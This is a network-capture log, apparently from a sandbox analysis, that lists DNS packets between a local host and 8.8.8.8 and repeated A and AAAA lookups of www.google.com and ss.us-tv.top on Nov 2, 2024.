Nov 2, 2024 04:02:20.807591915 CET	45294	53	192.168.2.14	8.8.8.8
Nov 2, 2024 04:02:20.807670116 CET	53	45294	8.8.8.8	192.168.2.14
Nov 2, 2024 04:02:20.807718039 CET	45294	53	192.168.2.14	8.8.8.8
Nov 2, 2024 04:02:21.816334009 CET	45294	53	192.168.2.14	8.8.8.8
Nov 2, 2024 04:02:21.816586018 CET	45294	53	192.168.2.14	8.8.8.8
Nov 2, 2024 04:02:21.821230888 CET	53	45294	8.8.8.8	192.168.2.14
Nov 2, 2024 04:02:21.821300983 CET	53	45294	8.8.8.8	192.168.2.14
Nov 2, 2024 04:02:21.945935011 CET	53	45294	8.8.8.8	192.168.2.14
Nov 2, 2024 04:02:21.945974112 CET	53	45294	8.8.8.8	192.168.2.14
Nov 2, 2024 04:02:21.946219921 CET	45294	53	192.168.2.14	8.8.8.8
Nov 2, 2024 04:02:21.946219921 CET	45294	53	192.168.2.14	8.8.8.8
Nov 2, 2024 04:02:22.954967976 CET	45294	53	192.168.2.14	8.8.8.8
Nov 2, 2024 04:02:22.955491066 CET	45294	53	192.168.2.14	8.8.8.8
Nov 2, 2024 04:02:22.959904909 CET	53	45294	8.8.8.8	192.168.2.14
Nov 2, 2024 04:02:22.960284948 CET	53	45294	8.8.8.8	192.168.2.14
Nov 2, 2024 04:02:23.084233999 CET	53	45294	8.8.8.8	192.168.2.14
Nov 2, 2024 04:02:23.084358931 CET	45294	53	192.168.2.14	8.8.8.8
Nov 2, 2024 04:02:24.092771053 CET	45294	53	192.168.2.14	8.8.8.8
Nov 2, 2024 04:02:24.093050957 CET	45294	53	192.168.2.14	8.8.8.8
Nov 2, 2024 04:02:24.101557016 CET	53	45294	8.8.8.8	192.168.2.14
Nov 2, 2024 04:02:24.101572990 CET	53	45294	8.8.8.8	192.168.2.14
Nov 2, 2024 04:02:24.225100040 CET	53	45294	8.8.8.8	192.168.2.14
Nov 2, 2024 04:02:24.225245953 CET	53	45294	8.8.8.8	192.168.2.14
Nov 2, 2024 04:02:24.225296974 CET	45294	53	192.168.2.14	8.8.8.8
Nov 2, 2024 04:02:24.225296974 CET	45294	53	192.168.2.14	8.8.8.8
Nov 2, 2024 04:02:25.231652021 CET	45294	53	192.168.2.14	8.8.8.8
Nov 2, 2024 04:02:25.232290030 CET	45294	53	192.168.2.14	8.8.8.8
Nov 2, 2024 04:02:25.236504078 CET	53	45294	8.8.8.8	192.168.2.14
Nov 2, 2024 04:02:25.237025976 CET	53	45294	8.8.8.8	192.168.2.14
Nov 2, 2024 04:02:25.526611090 CET	53	45294	8.8.8.8	192.168.2.14
Nov 2, 2024 04:02:25.526722908 CET	45294	53	192.168.2.14	8.8.8.8
Nov 2, 2024 04:02:26.534441948 CET	45294	53	192.168.2.14	8.8.8.8
Nov 2, 2024 04:02:26.534676075 CET	45294	53	192.168.2.14	8.8.8.8
Nov 2, 2024 04:02:26.539324999 CET	53	45294	8.8.8.8	192.168.2.14
Nov 2, 2024 04:02:26.539412022 CET	53	45294	8.8.8.8	192.168.2.14
Nov 2, 2024 04:02:26.663995981 CET	53	45294	8.8.8.8	192.168.2.14
Nov 2, 2024 04:02:26.664025068 CET	53	45294	8.8.8.8	192.168.2.14
Nov 2, 2024 04:02:26.664223909 CET	45294	53	192.168.2.14	8.8.8.8
Nov 2, 2024 04:02:26.664254904 CET	45294	53	192.168.2.14	8.8.8.8
Nov 2, 2024 04:02:27.672878027 CET	45294	53	192.168.2.14	8.8.8.8
Nov 2, 2024 04:02:27.673883915 CET	45294	53	192.168.2.14	8.8.8.8
Nov 2, 2024 04:02:27.677709103 CET	53	45294	8.8.8.8	192.168.2.14
Nov 2, 2024 04:02:27.678634882 CET	53	45294	8.8.8.8	192.168.2.14
Nov 2, 2024 04:02:27.801099062 CET	53	45294	8.8.8.8	192.168.2.14
Nov 2, 2024 04:02:27.801235914 CET	45294	53	192.168.2.14	8.8.8.8
Nov 2, 2024 04:02:27.802040100 CET	53	45294	8.8.8.8	192.168.2.14
Nov 2, 2024 04:02:27.802090883 CET	45294	53	192.168.2.14	8.8.8.8
Nov 2, 2024 04:02:27.802589893 CET	53	45294	8.8.8.8	192.168.2.14
Nov 2, 2024 04:02:27.802751064 CET	45294	53	192.168.2.14	8.8.8.8
Nov 2, 2024 04:02:27.807578087 CET	53	45294	8.8.8.8	192.168.2.14
Nov 2, 2024 04:02:28.811213970 CET	45360	53	192.168.2.14	8.8.8.8
Nov 2, 2024 04:02:28.816097975 CET	53	45360	8.8.8.8	192.168.2.14
Nov 2, 2024 04:02:28.816170931 CET	45360	53	192.168.2.14	8.8.8.8
Nov 2, 2024 04:02:28.816216946 CET	45360	53	192.168.2.14	8.8.8.8
Nov 2, 2024 04:02:28.816261053 CET	45360	53	192.168.2.14	8.8.8.8
Nov 2, 2024 04:02:28.821069002 CET	53	45360	8.8.8.8	192.168.2.14
Nov 2, 2024 04:02:28.821084023 CET	53	45360	8.8.8.8	192.168.2.14
Nov 2, 2024 04:02:29.423918009 CET	53	45360	8.8.8.8	192.168.2.14
Nov 2, 2024 04:02:29.423959970 CET	53	45360	8.8.8.8	192.168.2.14
Nov 2, 2024 04:02:29.424067974 CET	45360	53	192.168.2.14	8.8.8.8
Nov 2, 2024 04:02:29.424067974 CET	45360	53	192.168.2.14	8.8.8.8
Nov 2, 2024 04:02:30.434113979 CET	45360	53	192.168.2.14	8.8.8.8
Nov 2, 2024 04:02:30.434459925 CET	45360	53	192.168.2.14	8.8.8.8
Nov 2, 2024 04:02:30.439114094 CET	53	45360	8.8.8.8	192.168.2.14
Nov 2, 2024 04:02:30.439244032 CET	53	45360	8.8.8.8	192.168.2.14
Nov 2, 2024 04:02:30.561338902 CET	53	45360	8.8.8.8	192.168.2.14
Nov 2, 2024 04:02:30.561356068 CET	53	45360	8.8.8.8	192.168.2.14
Nov 2, 2024 04:02:30.561472893 CET	45360	53	192.168.2.14	8.8.8.8
Nov 2, 2024 04:02:30.561472893 CET	45360	53	192.168.2.14	8.8.8.8
Nov 2, 2024 04:02:31.570072889 CET	45360	53	192.168.2.14	8.8.8.8
Nov 2, 2024 04:02:31.570298910 CET	45360	53	192.168.2.14	8.8.8.8
Nov 2, 2024 04:02:31.575288057 CET	53	45360	8.8.8.8	192.168.2.14
Nov 2, 2024 04:02:31.575303078 CET	53	45360	8.8.8.8	192.168.2.14
Nov 2, 2024 04:02:31.697402954 CET	53	45360	8.8.8.8	192.168.2.14
Nov 2, 2024 04:02:31.697480917 CET	53	45360	8.8.8.8	192.168.2.14
Nov 2, 2024 04:02:31.697559118 CET	45360	53	192.168.2.14	8.8.8.8
Nov 2, 2024 04:02:31.697560072 CET	45360	53	192.168.2.14	8.8.8.8
Nov 2, 2024 04:02:32.704515934 CET	45360	53	192.168.2.14	8.8.8.8
Nov 2, 2024 04:02:32.704669952 CET	45360	53	192.168.2.14	8.8.8.8
Nov 2, 2024 04:02:32.709400892 CET	53	45360	8.8.8.8	192.168.2.14
Nov 2, 2024 04:02:32.709518909 CET	53	45360	8.8.8.8	192.168.2.14
Nov 2, 2024 04:02:33.226149082 CET	53	45360	8.8.8.8	192.168.2.14
Nov 2, 2024 04:02:33.226398945 CET	45360	53	192.168.2.14	8.8.8.8

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Nov 2, 2024 04:00:37.505662918 CET	192.168.2.14	8.8.8.8	0x9902	Standard query (0)	www.google.com	28	IN (0x0001)	false
Nov 2, 2024 04:00:37.505716085 CET	192.168.2.14	8.8.8.8	0xe85c	Standard query (0)	www.google.com	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:00:38.142487049 CET	192.168.2.14	8.8.8.8	0x3deb	Standard query (0)	ss.us-tv.top	28	IN (0x0001)	false
Nov 2, 2024 04:00:38.142842054 CET	192.168.2.14	8.8.8.8	0x78ac	Standard query (0)	ss.us-tv.top	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:00:39.277672052 CET	192.168.2.14	8.8.8.8	0x1503	Standard query (0)	ss.us-tv.top	28	IN (0x0001)	false
Nov 2, 2024 04:00:39.277971029 CET	192.168.2.14	8.8.8.8	0xd89	Standard query (0)	ss.us-tv.top	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:00:40.624275923 CET	192.168.2.14	8.8.8.8	0x469c	Standard query (0)	ss.us-tv.top	28	IN (0x0001)	false
Nov 2, 2024 04:00:40.624317884 CET	192.168.2.14	8.8.8.8	0xf04b	Standard query (0)	ss.us-tv.top	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:00:41.764516115 CET	192.168.2.14	8.8.8.8	0x3f18	Standard query (0)	ss.us-tv.top	28	IN (0x0001)	false
Nov 2, 2024 04:00:41.764566898 CET	192.168.2.14	8.8.8.8	0xdac1	Standard query (0)	ss.us-tv.top	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:00:42.902118921 CET	192.168.2.14	8.8.8.8	0x80ac	Standard query (0)	ss.us-tv.top	28	IN (0x0001)	false
Nov 2, 2024 04:00:42.902251005 CET	192.168.2.14	8.8.8.8	0xa90	Standard query (0)	ss.us-tv.top	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:00:44.037980080 CET	192.168.2.14	8.8.8.8	0xb984	Standard query (0)	ss.us-tv.top	28	IN (0x0001)	false
Nov 2, 2024 04:00:44.038228989 CET	192.168.2.14	8.8.8.8	0x1e6f	Standard query (0)	ss.us-tv.top	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:00:45.176632881 CET	192.168.2.14	8.8.8.8	0x7edc	Standard query (0)	ss.us-tv.top	28	IN (0x0001)	false
Nov 2, 2024 04:00:45.176671982 CET	192.168.2.14	8.8.8.8	0x7bf5	Standard query (0)	ss.us-tv.top	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:00:46.310878992 CET	192.168.2.14	8.8.8.8	0x1281	Standard query (0)	ss.us-tv.top	28	IN (0x0001)	false
Nov 2, 2024 04:00:46.311356068 CET	192.168.2.14	8.8.8.8	0xf682	Standard query (0)	ss.us-tv.top	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:00:47.736628056 CET	192.168.2.14	8.8.8.8	0x8a23	Standard query (0)	ss.us-tv.top	28	IN (0x0001)	false
Nov 2, 2024 04:00:47.736679077 CET	192.168.2.14	8.8.8.8	0x97e5	Standard query (0)	ss.us-tv.top	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:00:48.872406006 CET	192.168.2.14	8.8.8.8	0xa77c	Standard query (0)	ss.us-tv.top	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:00:48.872487068 CET	192.168.2.14	8.8.8.8	0xdcf1	Standard query (0)	ss.us-tv.top	28	IN (0x0001)	false
Nov 2, 2024 04:00:50.009536028 CET	192.168.2.14	8.8.8.8	0x452b	Standard query (0)	ss.us-tv.top	28	IN (0x0001)	false
Nov 2, 2024 04:00:50.009951115 CET	192.168.2.14	8.8.8.8	0xa1f6	Standard query (0)	ss.us-tv.top	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:00:51.146131039 CET	192.168.2.14	8.8.8.8	0xa518	Standard query (0)	ss.us-tv.top	28	IN (0x0001)	false
Nov 2, 2024 04:00:51.148260117 CET	192.168.2.14	8.8.8.8	0x7d1e	Standard query (0)	ss.us-tv.top	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:00:52.283636093 CET	192.168.2.14	8.8.8.8	0x2d7f	Standard query (0)	ss.us-tv.top	28	IN (0x0001)	false
Nov 2, 2024 04:00:52.283756971 CET	192.168.2.14	8.8.8.8	0x817b	Standard query (0)	ss.us-tv.top	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:00:53.419107914 CET	192.168.2.14	8.8.8.8	0xb513	Standard query (0)	ss.us-tv.top	28	IN (0x0001)	false
Nov 2, 2024 04:00:53.419751883 CET	192.168.2.14	8.8.8.8	0x69c8	Standard query (0)	ss.us-tv.top	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:00:54.558147907 CET	192.168.2.14	8.8.8.8	0x979b	Standard query (0)	ss.us-tv.top	28	IN (0x0001)	false
Nov 2, 2024 04:00:54.559529066 CET	192.168.2.14	8.8.8.8	0xe84f	Standard query (0)	ss.us-tv.top	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:00:55.697817087 CET	192.168.2.14	8.8.8.8	0xe992	Standard query (0)	ss.us-tv.top	28	IN (0x0001)	false
Nov 2, 2024 04:00:55.698004007 CET	192.168.2.14	8.8.8.8	0xbb43	Standard query (0)	ss.us-tv.top	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:00:56.835278988 CET	192.168.2.14	8.8.8.8	0x6f0c	Standard query (0)	ss.us-tv.top	28	IN (0x0001)	false
Nov 2, 2024 04:00:56.835416079 CET	192.168.2.14	8.8.8.8	0xc671	Standard query (0)	ss.us-tv.top	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:00:57.973895073 CET	192.168.2.14	8.8.8.8	0x85d3	Standard query (0)	ss.us-tv.top	28	IN (0x0001)	false
Nov 2, 2024 04:00:57.973954916 CET	192.168.2.14	8.8.8.8	0x192d	Standard query (0)	ss.us-tv.top	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:00:59.113055944 CET	192.168.2.14	8.8.8.8	0xabd2	Standard query (0)	ss.us-tv.top	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:00:59.113126040 CET	192.168.2.14	8.8.8.8	0xf39f	Standard query (0)	ss.us-tv.top	28	IN (0x0001)	false
Nov 2, 2024 04:01:00.248847008 CET	192.168.2.14	8.8.8.8	0x7421	Standard query (0)	ss.us-tv.top	28	IN (0x0001)	false
Nov 2, 2024 04:01:00.248920918 CET	192.168.2.14	8.8.8.8	0xadbd	Standard query (0)	ss.us-tv.top	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:01:01.387742043 CET	192.168.2.14	8.8.8.8	0x989f	Standard query (0)	ss.us-tv.top	28	IN (0x0001)	false
Nov 2, 2024 04:01:01.387798071 CET	192.168.2.14	8.8.8.8	0x6444	Standard query (0)	ss.us-tv.top	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:01:02.525871038 CET	192.168.2.14	8.8.8.8	0xa5a3	Standard query (0)	ss.us-tv.top	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:01:02.526618958 CET	192.168.2.14	8.8.8.8	0x87d	Standard query (0)	ss.us-tv.top	28	IN (0x0001)	false
Nov 2, 2024 04:01:03.662988901 CET	192.168.2.14	8.8.8.8	0x8f36	Standard query (0)	ss.us-tv.top	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:01:03.663075924 CET	192.168.2.14	8.8.8.8	0xe8d	Standard query (0)	ss.us-tv.top	28	IN (0x0001)	false
Nov 2, 2024 04:01:04.799942970 CET	192.168.2.14	8.8.8.8	0x3f6f	Standard query (0)	ss.us-tv.top	28	IN (0x0001)	false
Nov 2, 2024 04:01:04.799942970 CET	192.168.2.14	8.8.8.8	0x9100	Standard query (0)	ss.us-tv.top	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:01:05.936368942 CET	192.168.2.14	8.8.8.8	0x6c8a	Standard query (0)	ss.us-tv.top	28	IN (0x0001)	false
Nov 2, 2024 04:01:05.936476946 CET	192.168.2.14	8.8.8.8	0x8cb3	Standard query (0)	ss.us-tv.top	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:01:07.071021080 CET	192.168.2.14	8.8.8.8	0xac49	Standard query (0)	ss.us-tv.top	28	IN (0x0001)	false
Nov 2, 2024 04:01:07.071223974 CET	192.168.2.14	8.8.8.8	0xd5	Standard query (0)	ss.us-tv.top	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:01:08.206212044 CET	192.168.2.14	8.8.8.8	0x4d6f	Standard query (0)	ss.us-tv.top	28	IN (0x0001)	false
Nov 2, 2024 04:01:08.206518888 CET	192.168.2.14	8.8.8.8	0x1d03	Standard query (0)	ss.us-tv.top	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:01:09.341998100 CET	192.168.2.14	8.8.8.8	0xa037	Standard query (0)	ss.us-tv.top	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:01:09.342025042 CET	192.168.2.14	8.8.8.8	0x84ca	Standard query (0)	ss.us-tv.top	28	IN (0x0001)	false
Nov 2, 2024 04:01:10.480093956 CET	192.168.2.14	8.8.8.8	0xfed9	Standard query (0)	ss.us-tv.top	28	IN (0x0001)	false
Nov 2, 2024 04:01:10.480132103 CET	192.168.2.14	8.8.8.8	0xc88d	Standard query (0)	ss.us-tv.top	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:01:11.626684904 CET	192.168.2.14	8.8.8.8	0x3393	Standard query (0)	ss.us-tv.top	28	IN (0x0001)	false
Nov 2, 2024 04:01:11.626950026 CET	192.168.2.14	8.8.8.8	0xca3c	Standard query (0)	ss.us-tv.top	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:01:12.762295008 CET	192.168.2.14	8.8.8.8	0x47fe	Standard query (0)	ss.us-tv.top	28	IN (0x0001)	false
Nov 2, 2024 04:01:12.762515068 CET	192.168.2.14	8.8.8.8	0xf37b	Standard query (0)	ss.us-tv.top	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:01:13.903525114 CET	192.168.2.14	8.8.8.8	0xffb8	Standard query (0)	ss.us-tv.top	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:01:13.903525114 CET	192.168.2.14	8.8.8.8	0xab24	Standard query (0)	ss.us-tv.top	28	IN (0x0001)	false
Nov 2, 2024 04:01:15.522964001 CET	192.168.2.14	8.8.8.8	0x333f	Standard query (0)	ss.us-tv.top	28	IN (0x0001)	false
Nov 2, 2024 04:01:15.523000956 CET	192.168.2.14	8.8.8.8	0xc907	Standard query (0)	ss.us-tv.top	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:01:16.667975903 CET	192.168.2.14	8.8.8.8	0xab61	Standard query (0)	ss.us-tv.top	28	IN (0x0001)	false
Nov 2, 2024 04:01:16.668164968 CET	192.168.2.14	8.8.8.8	0x23a1	Standard query (0)	ss.us-tv.top	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:01:17.808406115 CET	192.168.2.14	8.8.8.8	0x1675	Standard query (0)	ss.us-tv.top	28	IN (0x0001)	false
Nov 2, 2024 04:01:17.808696985 CET	192.168.2.14	8.8.8.8	0xd572	Standard query (0)	ss.us-tv.top	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:01:18.954078913 CET	192.168.2.14	8.8.8.8	0x9674	Standard query (0)	ss.us-tv.top	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:01:18.954864025 CET	192.168.2.14	8.8.8.8	0xdc25	Standard query (0)	ss.us-tv.top	28	IN (0x0001)	false
Nov 2, 2024 04:01:20.303839922 CET	192.168.2.14	8.8.8.8	0x16a8	Standard query (0)	ss.us-tv.top	28	IN (0x0001)	false
Nov 2, 2024 04:01:20.305394888 CET	192.168.2.14	8.8.8.8	0x54a3	Standard query (0)	ss.us-tv.top	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:01:21.442405939 CET	192.168.2.14	8.8.8.8	0x4a35	Standard query (0)	ss.us-tv.top	28	IN (0x0001)	false
Nov 2, 2024 04:01:21.442620993 CET	192.168.2.14	8.8.8.8	0x2909	Standard query (0)	ss.us-tv.top	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:01:22.580471039 CET	192.168.2.14	8.8.8.8	0x540a	Standard query (0)	ss.us-tv.top	28	IN (0x0001)	false
Nov 2, 2024 04:01:22.580780029 CET	192.168.2.14	8.8.8.8	0x54c5	Standard query (0)	ss.us-tv.top	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:01:23.721712112 CET	192.168.2.14	8.8.8.8	0xbc8b	Standard query (0)	ss.us-tv.top	28	IN (0x0001)	false
Nov 2, 2024 04:01:23.721864939 CET	192.168.2.14	8.8.8.8	0x85a	Standard query (0)	ss.us-tv.top	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:01:24.861567020 CET	192.168.2.14	8.8.8.8	0x9241	Standard query (0)	ss.us-tv.top	28	IN (0x0001)	false
Nov 2, 2024 04:01:24.863017082 CET	192.168.2.14	8.8.8.8	0x3afd	Standard query (0)	ss.us-tv.top	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:01:26.003990889 CET	192.168.2.14	8.8.8.8	0x433d	Standard query (0)	ss.us-tv.top	28	IN (0x0001)	false
Nov 2, 2024 04:01:26.004328012 CET	192.168.2.14	8.8.8.8	0xcd4e	Standard query (0)	ss.us-tv.top	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:01:27.145122051 CET	192.168.2.14	8.8.8.8	0xbae9	Standard query (0)	ss.us-tv.top	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:01:27.147003889 CET	192.168.2.14	8.8.8.8	0x84c8	Standard query (0)	ss.us-tv.top	28	IN (0x0001)	false
Nov 2, 2024 04:01:28.288259029 CET	192.168.2.14	8.8.8.8	0x3a7e	Standard query (0)	ss.us-tv.top	28	IN (0x0001)	false
Nov 2, 2024 04:01:28.289227962 CET	192.168.2.14	8.8.8.8	0x5d6e	Standard query (0)	ss.us-tv.top	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:01:29.430043936 CET	192.168.2.14	8.8.8.8	0x372a	Standard query (0)	ss.us-tv.top	28	IN (0x0001)	false
Nov 2, 2024 04:01:29.430476904 CET	192.168.2.14	8.8.8.8	0x5e97	Standard query (0)	ss.us-tv.top	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:01:30.569361925 CET	192.168.2.14	8.8.8.8	0xb822	Standard query (0)	ss.us-tv.top	28	IN (0x0001)	false
Nov 2, 2024 04:01:30.569559097 CET	192.168.2.14	8.8.8.8	0xb640	Standard query (0)	ss.us-tv.top	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:01:31.706772089 CET	192.168.2.14	8.8.8.8	0xcbf7	Standard query (0)	ss.us-tv.top	28	IN (0x0001)	false
Nov 2, 2024 04:01:31.707434893 CET	192.168.2.14	8.8.8.8	0xccdc	Standard query (0)	ss.us-tv.top	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:01:32.843408108 CET	192.168.2.14	8.8.8.8	0x4e7e	Standard query (0)	ss.us-tv.top	28	IN (0x0001)	false
Nov 2, 2024 04:01:32.843611002 CET	192.168.2.14	8.8.8.8	0x8228	Standard query (0)	ss.us-tv.top	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:01:33.980844975 CET	192.168.2.14	8.8.8.8	0xaa2	Standard query (0)	ss.us-tv.top	28	IN (0x0001)	false
Nov 2, 2024 04:01:33.982065916 CET	192.168.2.14	8.8.8.8	0x7df3	Standard query (0)	ss.us-tv.top	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:01:35.123511076 CET	192.168.2.14	8.8.8.8	0xb3e4	Standard query (0)	ss.us-tv.top	28	IN (0x0001)	false
Nov 2, 2024 04:01:35.124129057 CET	192.168.2.14	8.8.8.8	0x5553	Standard query (0)	ss.us-tv.top	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:01:36.265413046 CET	192.168.2.14	8.8.8.8	0xcd13	Standard query (0)	ss.us-tv.top	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:01:36.267595053 CET	192.168.2.14	8.8.8.8	0xe752	Standard query (0)	ss.us-tv.top	28	IN (0x0001)	false
Nov 2, 2024 04:01:37.407047033 CET	192.168.2.14	8.8.8.8	0x728b	Standard query (0)	ss.us-tv.top	28	IN (0x0001)	false
Nov 2, 2024 04:01:37.407491922 CET	192.168.2.14	8.8.8.8	0xb3ad	Standard query (0)	ss.us-tv.top	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:01:39.011508942 CET	192.168.2.14	8.8.8.8	0xce75	Standard query (0)	ss.us-tv.top	28	IN (0x0001)	false
Nov 2, 2024 04:01:39.011918068 CET	192.168.2.14	8.8.8.8	0x9273	Standard query (0)	ss.us-tv.top	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:01:40.151834011 CET	192.168.2.14	8.8.8.8	0xf706	Standard query (0)	ss.us-tv.top	28	IN (0x0001)	false
Nov 2, 2024 04:01:40.154289961 CET	192.168.2.14	8.8.8.8	0x3178	Standard query (0)	ss.us-tv.top	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:01:41.290709972 CET	192.168.2.14	8.8.8.8	0xab24	Standard query (0)	ss.us-tv.top	28	IN (0x0001)	false
Nov 2, 2024 04:01:41.290803909 CET	192.168.2.14	8.8.8.8	0xe604	Standard query (0)	ss.us-tv.top	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:01:42.427287102 CET	192.168.2.14	8.8.8.8	0x8a5f	Standard query (0)	ss.us-tv.top	28	IN (0x0001)	false
Nov 2, 2024 04:01:42.427362919 CET	192.168.2.14	8.8.8.8	0xe951	Standard query (0)	ss.us-tv.top	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:01:43.568923950 CET	192.168.2.14	8.8.8.8	0x10d3	Standard query (0)	ss.us-tv.top	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:01:43.569123983 CET	192.168.2.14	8.8.8.8	0xbcb0	Standard query (0)	ss.us-tv.top	28	IN (0x0001)	false
Nov 2, 2024 04:01:44.708317995 CET	192.168.2.14	8.8.8.8	0x6d62	Standard query (0)	ss.us-tv.top	28	IN (0x0001)	false
Nov 2, 2024 04:01:44.708749056 CET	192.168.2.14	8.8.8.8	0xbba5	Standard query (0)	ss.us-tv.top	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:01:45.845041037 CET	192.168.2.14	8.8.8.8	0x75a4	Standard query (0)	ss.us-tv.top	28	IN (0x0001)	false
Nov 2, 2024 04:01:45.845263004 CET	192.168.2.14	8.8.8.8	0x7e6a	Standard query (0)	ss.us-tv.top	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:01:46.980421066 CET	192.168.2.14	8.8.8.8	0xd6a0	Standard query (0)	ss.us-tv.top	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:01:46.980421066 CET	192.168.2.14	8.8.8.8	0xb590	Standard query (0)	ss.us-tv.top	28	IN (0x0001)	false
Nov 2, 2024 04:01:48.117764950 CET	192.168.2.14	8.8.8.8	0x8f5d	Standard query (0)	ss.us-tv.top	28	IN (0x0001)	false
Nov 2, 2024 04:01:48.118249893 CET	192.168.2.14	8.8.8.8	0x65cb	Standard query (0)	ss.us-tv.top	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:01:49.254297018 CET	192.168.2.14	8.8.8.8	0xd4ca	Standard query (0)	ss.us-tv.top	28	IN (0x0001)	false
Nov 2, 2024 04:01:49.254726887 CET	192.168.2.14	8.8.8.8	0xf274	Standard query (0)	ss.us-tv.top	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:01:50.390446901 CET	192.168.2.14	8.8.8.8	0x5ab	Standard query (0)	ss.us-tv.top	28	IN (0x0001)	false
Nov 2, 2024 04:01:50.390818119 CET	192.168.2.14	8.8.8.8	0x3033	Standard query (0)	ss.us-tv.top	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:01:51.531472921 CET	192.168.2.14	8.8.8.8	0xf04b	Standard query (0)	ss.us-tv.top	28	IN (0x0001)	false
Nov 2, 2024 04:01:51.531493902 CET	192.168.2.14	8.8.8.8	0x798c	Standard query (0)	ss.us-tv.top	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:01:53.156604052 CET	192.168.2.14	8.8.8.8	0x84ec	Standard query (0)	ss.us-tv.top	28	IN (0x0001)	false
Nov 2, 2024 04:01:53.157052994 CET	192.168.2.14	8.8.8.8	0x3474	Standard query (0)	ss.us-tv.top	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:01:54.293931007 CET	192.168.2.14	8.8.8.8	0x9947	Standard query (0)	ss.us-tv.top	28	IN (0x0001)	false
Nov 2, 2024 04:01:54.294876099 CET	192.168.2.14	8.8.8.8	0x3fe3	Standard query (0)	ss.us-tv.top	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:01:55.434772968 CET	192.168.2.14	8.8.8.8	0x8312	Standard query (0)	ss.us-tv.top	28	IN (0x0001)	false
Nov 2, 2024 04:01:55.435173988 CET	192.168.2.14	8.8.8.8	0x9e28	Standard query (0)	ss.us-tv.top	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:01:56.570622921 CET	192.168.2.14	8.8.8.8	0x3795	Standard query (0)	ss.us-tv.top	28	IN (0x0001)	false
Nov 2, 2024 04:01:56.570787907 CET	192.168.2.14	8.8.8.8	0xf8e9	Standard query (0)	ss.us-tv.top	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:01:57.708838940 CET	192.168.2.14	8.8.8.8	0xd3d8	Standard query (0)	ss.us-tv.top	28	IN (0x0001)	false
Nov 2, 2024 04:01:57.709297895 CET	192.168.2.14	8.8.8.8	0xfdc8	Standard query (0)	ss.us-tv.top	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:01:58.848160982 CET	192.168.2.14	8.8.8.8	0x198f	Standard query (0)	ss.us-tv.top	28	IN (0x0001)	false
Nov 2, 2024 04:01:58.849942923 CET	192.168.2.14	8.8.8.8	0xc4a1	Standard query (0)	ss.us-tv.top	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:01:59.984518051 CET	192.168.2.14	8.8.8.8	0x5289	Standard query (0)	ss.us-tv.top	28	IN (0x0001)	false
Nov 2, 2024 04:01:59.984735012 CET	192.168.2.14	8.8.8.8	0x7189	Standard query (0)	ss.us-tv.top	A (IP address)	IN (0x0001)	false
